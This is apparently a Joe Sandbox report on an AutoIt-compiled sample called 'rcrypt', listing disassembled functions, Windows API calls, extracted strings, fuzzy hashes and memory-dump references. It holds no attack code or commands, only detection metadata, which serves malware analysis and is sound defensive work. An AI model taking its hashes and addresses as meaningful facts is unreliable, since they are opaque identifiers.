Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 864f1ac7974f384c3327978fd1057199d6eaa366d60b791a898f9dc7a5afe834
Instruction ID: bc9fc0dc070590196e99df8a54f1dff33284acb54b1cf3b154ba976037a5e52d
Opcode Fuzzy Hash: 864f1ac7974f384c3327978fd1057199d6eaa366d60b791a898f9dc7a5afe834
Instruction Fuzzy Hash: B3A0123000010CA78A001B41EC044457F6CE7001947004020F40C40421873254918980

Function 00108A0E Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4812964801fab11eb50a9dbdae4afbb78457fcad5fe86a8cfc283e696615cee7
Instruction ID: cc4d2ebe678ad5e64aab3a769e62289bc869389ca4632b3584ce1f8dae3d3e21
Opcode Fuzzy Hash: 4812964801fab11eb50a9dbdae4afbb78457fcad5fe86a8cfc283e696615cee7
Instruction Fuzzy Hash: 0D222A3050961ACBEF288F14C5946BD77B2FB42344F65847AD8C68B6E2DBB49D81CB60

Function 00112405 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: d5021a8d0fb7c6ec71500aafb1c694ccdce26d221a6b2d43e16e569a8c6bf1fe
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 28C1A2322050930ADF6D863994745BEFAE15EA27B131A077DE8B3CB5C4EF20D5B9D620

Function 0011283A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 573e2e92373afad5661f9b8c55e737a6f1d8348703e215d324adfc8bd93fe277
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: FCC194322091A30ADF2D463994345BEFBE15EA27B131A077DE4B2DB5C4EF20D5B9D620

Function 016F35F0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1319460756.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_rcrypt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: f633ab6d4d171b561fa887939a48549b19c04249208ed0ce285b754e43482910
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: F841D271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80

Function 016F34E0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1319460756.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_rcrypt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: dc871929b6c90dacd1c232bf8b66b178a8903ccf136e4dbd80c7f09636c2817b
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 01019279A04109EFCB44DF98C5949AEF7B6FB88310F208599D909A7701D731AE41DB80

Function 016F3480 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1319460756.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_rcrypt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 45d3904274d15dc6e8e6ad76cb30329479a09c3340b8a3e79211519b8cd54bb2
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 3601A478A05109EFCB45DF98C5909AEF7F6FF48310F208599D909A7701D730AE41DB90

Function 016F1E70 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1319460756.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_rcrypt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00167B1B Relevance: 79.2, APIs: 40, Strings: 5, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00167B70
DeleteObject.GDI32(00000000), ref: 00167B82
DestroyWindow.USER32 ref: 00167B90
GetDesktopWindow.USER32 ref: 00167BAA
GetWindowRect.USER32(00000000), ref: 00167BB1
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00167CF2
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00167D02
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167D4A
GetClientRect.USER32(00000000,?), ref: 00167D56
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00167D90
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167DB2
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167DC5
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167DD0
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167DD9
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167DE8
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167DF1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167DF8
GlobalFree.KERNEL32(00000000), ref: 00167E03
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167E15
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00182CAC,00000000), ref: 00167E2B
GlobalFree.KERNEL32(00000000), ref: 00167E3B
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00167E61
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00167E80
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167EA2
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0016808F

Strings

@U=u, xrefs: 00167E80, 0016800F
DISPLAY, xrefs: 00167EF2
AutoIt v3, xrefs: 00167D42
, xrefs: 00168015
static, xrefs: 00167D8A, 00167EE1

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $@U=u$AutoIt v3$DISPLAY$static
API String ID: 2211948467-3613752883
Opcode ID: cd4237df3e7ed89db18fe6c5ab346f47c4d79d9e8f90afd36a730473b200f8ab
Instruction ID: d67d579680c8e03c2cfc1017a1295a54edb90d92efc419fec79671e8a01365d4
Opcode Fuzzy Hash: cd4237df3e7ed89db18fe6c5ab346f47c4d79d9e8f90afd36a730473b200f8ab
Instruction Fuzzy Hash: F7026C71900119EFDB14DFA4CC89EAF7BB9FB48314F148558F919AB2A1CB70AD81CB60

Function 0017A849 Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0017A89F
GetSysColorBrush.USER32(0000000F), ref: 0017A8D0
GetSysColor.USER32(0000000F), ref: 0017A8DC
SetBkColor.GDI32(?,000000FF), ref: 0017A8F6
SelectObject.GDI32(?,?), ref: 0017A905
InflateRect.USER32(?,000000FF,000000FF), ref: 0017A930
GetSysColor.USER32(00000010), ref: 0017A938
CreateSolidBrush.GDI32(00000000), ref: 0017A93F
FrameRect.USER32(?,?,00000000), ref: 0017A94E
DeleteObject.GDI32(00000000), ref: 0017A955
InflateRect.USER32(?,000000FE,000000FE), ref: 0017A9A0
FillRect.USER32(?,?,?), ref: 0017A9D2
GetWindowLongW.USER32(?,000000F0), ref: 0017A9FD

Part of subcall function 0017AB60: GetSysColor.USER32(00000012), ref: 0017AB99
Part of subcall function 0017AB60: SetTextColor.GDI32(?,?), ref: 0017AB9D
Part of subcall function 0017AB60: GetSysColorBrush.USER32(0000000F), ref: 0017ABB3
Part of subcall function 0017AB60: GetSysColor.USER32(0000000F), ref: 0017ABBE
Part of subcall function 0017AB60: GetSysColor.USER32(00000011), ref: 0017ABDB
Part of subcall function 0017AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0017ABE9
Part of subcall function 0017AB60: SelectObject.GDI32(?,00000000), ref: 0017ABFA
Part of subcall function 0017AB60: SetBkColor.GDI32(?,00000000), ref: 0017AC03
Part of subcall function 0017AB60: SelectObject.GDI32(?,?), ref: 0017AC10
Part of subcall function 0017AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0017AC2F
Part of subcall function 0017AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0017AC46
Part of subcall function 0017AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0017AC5B

Strings

@U=u, xrefs: 0017AA4E

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID: @U=u
API String ID: 4124339563-2594219639
Opcode ID: 723259a10d374323d291c6ff65ed1ceaed51c658d3d434a787bc32a06bbb12e6
Instruction ID: 0935a8a62e7a15fddc640caabf4b43710f595e2b3d92c17c96c06ad7d2e4016a
Opcode Fuzzy Hash: 723259a10d374323d291c6ff65ed1ceaed51c658d3d434a787bc32a06bbb12e6
Instruction Fuzzy Hash: F1A19F72008301AFD7109F64DC08A6F7BB9FF88321F504A2DFA6A961E0D730D985CB52

Function 001737F3 Relevance: 52.9, APIs: 6, Strings: 24, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0017F910), ref: 001738AF
IsWindowVisible.USER32(?), ref: 001738D3

Strings

ISVISIBLE, xrefs: 001738BF
SENDCOMMANDID, xrefs: 00173C62
GETLINECOUNT, xrefs: 00173B4E
@U=u, xrefs: 00173B6B, 00173B92, 00173C1B
ISCHECKED, xrefs: 00173AC1
SETCURRENTSELECTION, xrefs: 00173A3E
GETCURRENTCOL, xrefs: 00173BB0
CURRENTTAB, xrefs: 00173945
CHECK, xrefs: 00173AF5
TABLEFT, xrefs: 0017390F
ISENABLED, xrefs: 001738F3
SHOWDROPDOWN, xrefs: 00173968
FINDSTRING, xrefs: 001739FE
HIDEDROPDOWN, xrefs: 00173988
DELSTRING, xrefs: 001739D1
GETCURRENTLINE, xrefs: 00173B75
EDITPASTE, xrefs: 00173BE7
TABRIGHT, xrefs: 00173925
ADDSTRING, xrefs: 0017399E
SELECTSTRING, xrefs: 00173A8E
GETLINE, xrefs: 00173C23
GETSELECTED, xrefs: 00173B2B
UNCHECK, xrefs: 00173B0B
GETCURRENTSELECTION, xrefs: 00173A6B

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: @U=u$ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-3469695742
Opcode ID: 8451f52cb395ccc6a6c7d580b38fe78509b8e4ab4f6a197849de7d413c585eba
Instruction ID: ed853de0461e80c7e3ccaa91a025ac0d65fb10aebfdaf06f47c20854535d0816
Opcode Fuzzy Hash: 8451f52cb395ccc6a6c7d580b38fe78509b8e4ab4f6a197849de7d413c585eba
Instruction Fuzzy Hash: 2FD1C734208305CBCB15EF50C551AAE77B1BF58354F11846DB89A6B3A3CB71EE8ADB42

Function 000F2C18 Relevance: 51.2, APIs: 27, Strings: 2, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 000F2CA2
DeleteObject.GDI32(00000000), ref: 000F2CE8
DeleteObject.GDI32(00000000), ref: 000F2CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 000F2CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 000F2D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 0012C68B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0012C6C4
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0012CAED

Part of subcall function 000F1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000F2036,?,00000000,?,?,?,?,000F16CB,00000000,?), ref: 000F1B9A

SendMessageW.USER32(?,00001053), ref: 0012CB2A
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0012CB41
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0012CB57
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0012CB62

Strings

@U=u, xrefs: 0012C68B, 0012C792, 0012CA6D
0, xrefs: 0012C981

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0$@U=u
API String ID: 464785882-975001249
Opcode ID: 7b27c6751d1a42988b281abb825e96c4033da0369d45f2e36453e63fb09d3985
Instruction ID: f714c48f557298ecdde24f63c3cd62d0a354e3d0d69bfec76906366d4ab55fc8
Opcode Fuzzy Hash: 7b27c6751d1a42988b281abb825e96c4033da0369d45f2e36453e63fb09d3985
Instruction Fuzzy Hash: EC129C30600215AFDB24CF24D884BAEB7E5BF45300F544569F699DB662C731E8A2DF91

Function 001677BE Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 001677F1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 001678B0
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 001678EE
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00167900
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00167946
GetClientRect.USER32(00000000,?), ref: 00167952
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00167996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001679A5
GetStockObject.GDI32(00000011), ref: 001679B5
SelectObject.GDI32(00000000,00000000), ref: 001679B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 001679C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 001679D2
DeleteDC.GDI32(00000000), ref: 001679DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00167A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 00167A1E
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00167A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00167A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 00167A7E
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00167AAE
GetStockObject.GDI32(00000011), ref: 00167AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00167AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00167ACE

Strings

msctls_progress32, xrefs: 00167A4F
@U=u, xrefs: 00167A0D
DISPLAY, xrefs: 0016799B
AutoIt v3, xrefs: 0016793E
static, xrefs: 00167990, 00167AA8

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: @U=u$AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-2771358697
Opcode ID: 8eaad3c56175d39908403d8dee51d3c712a7e965ddfeceff18800ddba293f66d
Instruction ID: ba96bb51b7af6bed3150bfb3b6a6ba122168e1d3a5c0c93ad779441eb7f04a2b
Opcode Fuzzy Hash: 8eaad3c56175d39908403d8dee51d3c712a7e965ddfeceff18800ddba293f66d
Instruction Fuzzy Hash: 50A18F71A40209BFEB14DBA4DC4AFAF7BB9EB44714F004258FA15A76E0D774AD41CB60

Function 0017AB60 Relevance: 47.5, APIs: 26, Strings: 1, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0017AB99
SetTextColor.GDI32(?,?), ref: 0017AB9D
GetSysColorBrush.USER32(0000000F), ref: 0017ABB3
GetSysColor.USER32(0000000F), ref: 0017ABBE
CreateSolidBrush.GDI32(?), ref: 0017ABC3
GetSysColor.USER32(00000011), ref: 0017ABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0017ABE9
SelectObject.GDI32(?,00000000), ref: 0017ABFA
SetBkColor.GDI32(?,00000000), ref: 0017AC03
SelectObject.GDI32(?,?), ref: 0017AC10
InflateRect.USER32(?,000000FF,000000FF), ref: 0017AC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0017AC46
GetWindowLongW.USER32(00000000,000000F0), ref: 0017AC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0017ACA7
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0017ACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 0017ACEC
DrawFocusRect.USER32(?,?), ref: 0017ACF7
GetSysColor.USER32(00000011), ref: 0017AD05
SetTextColor.GDI32(?,00000000), ref: 0017AD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0017AD21
SelectObject.GDI32(?,0017A869), ref: 0017AD38
DeleteObject.GDI32(?), ref: 0017AD43
SelectObject.GDI32(?,?), ref: 0017AD49
DeleteObject.GDI32(?), ref: 0017AD4E
SetTextColor.GDI32(?,?), ref: 0017AD54
SetBkColor.GDI32(?,?), ref: 0017AD5E

Strings

@U=u, xrefs: 0017ACA7

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID: @U=u
API String ID: 1996641542-2594219639
Opcode ID: 33677c8b3f40cecfd27675e18ce975b3b3334e3c0fa2518a667656e90fa4349d
Instruction ID: c012295681c16525f72cd3c01a10cec06762e40b3d5e0b2ca8009a321b793e68
Opcode Fuzzy Hash: 33677c8b3f40cecfd27675e18ce975b3b3334e3c0fa2518a667656e90fa4349d
Instruction Fuzzy Hash: AB614D71900218FFDB119FA4DC48EAE7B79FF48320F118129F919AB2A1D7759D81DB90

Function 0015AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0015AF89
GetDriveTypeW.KERNEL32(?,0017FAC0,?,\\.\,0017F910), ref: 0015B066
SetErrorMode.KERNEL32(00000000,0017FAC0,?,\\.\,0017F910), ref: 0015B1C4

Strings

SSD, xrefs: 0015B0F1
SAS, xrefs: 0015B170
SSA, xrefs: 0015B14D
MMC, xrefs: 0015B185
Removable, xrefs: 0015B0B8
Network, xrefs: 0015B0A4
Virtual, xrefs: 0015B18C
PhysicalDrive, xrefs: 0015B012
RAMDisk, xrefs: 0015B090
iSCSI, xrefs: 0015B169
Fixed, xrefs: 0015B0AE
\\.\, xrefs: 0015AFDB
ATAPI, xrefs: 0015B138
ATA, xrefs: 0015B13F
Unknown, xrefs: 0015B086, 0015B12A
FileBackedVirtual, xrefs: 0015B193
CDROM, xrefs: 0015B09A
SATA, xrefs: 0015B177
SCSI, xrefs: 0015B131
USB, xrefs: 0015B15B
Fibre, xrefs: 0015B154
RAID, xrefs: 0015B162
1394, xrefs: 0015B146

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 8f1ad26262feaefa7d867d3872f6b8db15f1f3daf4d2a5cd82a20dfb9c055ccb
Instruction ID: bf4f66f9dfc87daed5a37da81346e027f7e99e976a278fae72e9d463f17747ca
